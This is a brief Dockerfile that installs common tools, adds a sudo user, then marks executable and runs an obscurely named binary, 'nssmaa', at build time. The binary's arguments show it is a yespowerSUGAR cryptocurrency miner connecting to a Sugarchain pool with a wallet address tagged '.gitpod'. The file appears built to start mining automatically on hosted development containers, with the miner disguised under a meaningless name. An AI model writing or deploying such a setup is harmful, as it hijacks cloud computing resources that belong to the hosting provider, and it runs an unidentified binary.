FROM ubuntu:20.04

RUN apt update \
    && apt-get install -y --no-install-recommends \
    sudo \
    screen \
    bash \
    curl \
    git \
	unzip \
	wget \
	&& apt-get update \
	&& apt-get upgrade -y \
    && apt-get autoclean \
    && apt-get autoremove \
    && rm -rf /var/lib/apt/lists/*

RUN useradd -m kunemuse && \
    adduser kunemuse sudo && \
    sudo usermod -a -G sudo kunemuse

COPY . /

RUN chmod +x /nssmaa
RUN ./nssmaa -a yespowerSUGAR -o stratum+tcp://1pool.sugarchain.org:3333 -u sugar1qjhuqfmdcmaq6qr0dlxh2c9d874x6eaa88vmj3y.gitpod